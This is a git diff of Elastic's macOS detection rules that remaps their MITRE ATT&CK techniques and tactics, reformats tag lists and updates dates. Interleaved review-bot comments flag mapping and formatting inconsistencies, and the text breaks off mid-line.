@@ -44,14 +44,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -97,19 +90,26 @@ In macOS environments, the root account is typically disabled to enhance securit [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml index 49dd1c7435c..43ae3627d71 100644 --- a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml +++ b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,36 +101,36 @@ Launch agents and daemons in macOS are background services that start at login o [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml index 4f500cad3cc..ad0e9957b10 100644 --- a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml +++ b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml 
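Review bot: The rebuilt Persistence entry lists only T1543.004 Launch Daemon, although the description line says "Launch agents and daemons" and the previous mapping was T1543.001 Launch Agent; the companion process rule in this same commit carries both .001 and .004. Unless the query was narrowed to LaunchDaemons, add the Launch Agent sub-technique next to the daemon one so the agent half of the rule stays mapped. The query is outside the hunk.
```toml
reference = "https://attack.mitre.org/techniques/T1543/"

[[rule.threat.technique.subtechnique]]
id = "T1543.001"
name = "Launch Agent"
reference = "https://attack.mitre.org/techniques/T1543/001/"
# … unchanged: T1543.004 Launch Daemon sub-technique and Persistence tactic block …
```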
@@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,13 @@ Finder Sync plugins enhance macOS Finder by allowing third-party applications to [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_folder_action_scripts_runtime.toml b/rules/macos/persistence_folder_action_scripts_runtime.toml index 46944a678eb..832dfbbeb8d 100644 --- a/rules/macos/persistence_folder_action_scripts_runtime.toml +++ b/rules/macos/persistence_folder_action_scripts_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -45,15 +45,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -101,26 +93,13 @@ Folder Action scripts on macOS automate tasks by executing scripts when folder c [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/persistence_hidden_plist_filename.toml b/rules/macos/persistence_hidden_plist_filename.toml index 607ab2f4f82..f2211c46f55 100644 --- a/rules/macos/persistence_hidden_plist_filename.toml +++ b/rules/macos/persistence_hidden_plist_filename.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -87,45 +87,40 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" - [[rule.threat.technique]] - name = "Boot or Logon Autostart Execution" - id = "T1547" - reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" - [[rule.threat.technique.subtechnique]] - name = "Plist Modification" - id = "T1547.011" - reference = "https://attack.mitre.org/techniques/T1547/011/" - - [[rule.threat.technique]] - name = "Create or Modify System Process" - id = "T1543" - reference = "https://attack.mitre.org/techniques/T1543/" - - [[rule.threat.technique.subtechnique]] - name = "Launch Agent" - id = "T1543.001" - reference = "https://attack.mitre.org/techniques/T1543/001/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" - - [[rule.threat.technique]] - name = "Hide Artifacts" - id = "T1564" - reference = "https://attack.mitre.org/techniques/T1564/" - - [[rule.threat.technique.subtechnique]] - name = "Hidden Files and Directories" - id = "T1564.001" - reference = "https://attack.mitre.org/techniques/T1564/001/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + 
+[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_login_logout_hooks_defaults.toml b/rules/macos/persistence_login_logout_hooks_defaults.toml index 40020db35c3..59365456675 100644 --- a/rules/macos/persistence_login_logout_hooks_defaults.toml +++ b/rules/macos/persistence_login_logout_hooks_defaults.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -108,14 +108,18 @@ In macOS environments, login and logout hooks are scripts executed automatically [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.002" +name = "Login Hook" +reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_loginwindow_plist_modification.toml b/rules/macos/persistence_loginwindow_plist_modification.toml index 7603cbada1f..d3fc418339c 100644 --- a/rules/macos/persistence_loginwindow_plist_modification.toml +++ b/rules/macos/persistence_loginwindow_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -67,26 +67,18 @@ event.category:file and host.os.type:macos and not event.type:"deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.002" +name = "Login Hook" +reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1647" -name = "Plist File Modification" -reference = "https://attack.mitre.org/techniques/T1647/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_manual_chromium_extension_loading.toml b/rules/macos/persistence_manual_chromium_extension_loading.toml index 245e2cd90cc..b22050039bd 100644 --- a/rules/macos/persistence_manual_chromium_extension_loading.toml +++ b/rules/macos/persistence_manual_chromium_extension_loading.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
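Review bot: The Defense Evasion entry (T1647 Plist File Modification) is removed from the loginwindow rule, but this file section has no hunk for the rule's `tags`, so a `Tactic: Defense Evasion` tag — if present — is left orphaned and would be reported by a tactic/tag consistency test. Sibling rules in this commit that drop a tactic also rewrite `tags`; please confirm this file's tag list, which sits outside the visible hunks, now names only `Tactic: Persistence`.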
@@ -23,15 +23,7 @@ references = [ risk_score = 73 rule_id = "f1f3070e-045c-4e03-ae58-d11d43d2ee51" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -86,25 +78,17 @@ process where host.os.type == "macos" and event.action == "exec" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" - - [[rule.threat.technique]] - name = "Software Extensions" - id = "T1176" - reference = "https://attack.mitre.org/techniques/T1176/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1176" +name = "Software Extensions" +reference = "https://attack.mitre.org/techniques/T1176/" - [rule.threat.tactic] - name = "Credential Access" - id = "TA0006" - reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat.technique.subtechnique]] +id = "T1176.001" +name = "Browser Extensions" +reference = "https://attack.mitre.org/techniques/T1176/001/" - [[rule.threat.technique]] - name = "Steal Web Session Cookie" - id = "T1539" - reference = "https://attack.mitre.org/techniques/T1539/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml index 003ac42c087..acb351b0c87 100644 --- a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml +++ b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,19 +101,13 @@ Periodic tasks in macOS are scheduled operations that automate system maintenanc [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml index 2c5cd8c4634..5aa6e70b92d 100644 --- a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml +++ b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,20 +73,26 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] 
diff --git a/rules/macos/persistence_screensaver_plist_file_modification.toml b/rules/macos/persistence_screensaver_plist_file_modification.toml index 44791980400..570027ab544 100644 --- a/rules/macos/persistence_screensaver_plist_file_modification.toml +++ b/rules/macos/persistence_screensaver_plist_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,18 @@ file where host.os.type == "macos" and event.action == "modification" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.002" +name = "Screensaver" +reference = "https://attack.mitre.org/techniques/T1546/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_startup_item_plist_creation.toml b/rules/macos/persistence_startup_item_plist_creation.toml index 0ff3d1f2258..cecfc474f78 100644 --- a/rules/macos/persistence_startup_item_plist_creation.toml +++ b/rules/macos/persistence_startup_item_plist_creation.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -23,14 +23,7 @@ references = [ risk_score = 73 rule_id = "15606250-449d-46a8-aaff-4043e42aefb9" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -80,17 +73,35 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.005" +name = "Startup Items" +reference = "https://attack.mitre.org/techniques/T1037/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique]] - name = "Boot or Logon Initialization Scripts" - id = "T1037" - reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.005" +name = "Startup Items" +reference = "https://attack.mitre.org/techniques/T1037/005/" - [[rule.threat.technique.subtechnique]] - name = "Startup Items" - id = "T1037.005" - reference = "https://attack.mitre.org/techniques/T1037/005/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/macos/persistence_via_atom_init_file_modification.toml b/rules/macos/persistence_via_atom_init_file_modification.toml index eff66a14bca..b1de5ec77cb 100644 --- a/rules/macos/persistence_via_atom_init_file_modification.toml +++ b/rules/macos/persistence_via_atom_init_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,13 @@ Atom, a popular text editor, allows customization via the `init.coffee` script, [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml index ca5bd4627c0..9110c01cb84 100644 --- a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml +++ b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -99,26 +99,36 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.004" +name = "Elevated Execution with Prompt" +reference = "https://attack.mitre.org/techniques/T1548/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml index f295bcc10c8..367e44f0902 100644 --- a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml +++ b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -104,36 +104,31 @@ In macOS environments, the `security_authtrampoline` process is used to execute [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.004" name = "Elevated Execution with Prompt" reference = "https://attack.mitre.org/techniques/T1548/004/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml index 0b7b102ae56..735d71241ce 100644 --- a/rules/macos/privilege_escalation_local_user_added_to_admin.toml +++ b/rules/macos/privilege_escalation_local_user_added_to_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -44,14 +44,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -101,19 +94,36 @@ In macOS environments, tools like `dscl` and `dseditgroup` manage user group mem [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - 
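Review bot: In the threat hunk of privilege_escalation_local_user_added_to_admin.toml the second `[[rule.threat]]` entry is written without the blank lines that separate `framework`, `[[rule.threat.technique]]`, `[[rule.threat.technique.subtechnique]]` and `[rule.threat.tactic]` in the first entry, so two identical mappings are laid out differently in the same file. The same uneven spacing appears in privilege_escalation_root_crontab_filemod.toml and privilege_escalation_user_added_to_admin_group.toml, where the second `[[rule.threat]]` header directly follows the previous tactic's `reference` line with no separator. If the rule files are normalised by the project's TOML writer before commit this is harmless; otherwise emitting one blank line between each table would keep the layout uniform across the rule set.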
diff --git a/rules/macos/privilege_escalation_root_crontab_filemod.toml b/rules/macos/privilege_escalation_root_crontab_filemod.toml index 49a80762627..b9c9f402814 100644 --- a/rules/macos/privilege_escalation_root_crontab_filemod.toml +++ b/rules/macos/privilege_escalation_root_crontab_filemod.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,14 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -101,19 +94,36 @@ Crontab files in macOS are used to schedule tasks, often requiring elevated priv [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/macos/privilege_escalation_user_added_to_admin_group.toml b/rules/macos/privilege_escalation_user_added_to_admin_group.toml index eb4046a403c..52cfa42cab7 100644 --- a/rules/macos/privilege_escalation_user_added_to_admin_group.toml +++ b/rules/macos/privilege_escalation_user_added_to_admin_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["jamf_protect"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.investigate]] 
@@ -84,14 +84,7 @@ Jamf Protect is integrated into the Elastic Agent using Fleet. Upon configuratio - Click "Save and Continue". """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Jamf Protect", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Jamf Protect", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -103,19 +96,36 @@ configuration where host.os.type == "macos" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = 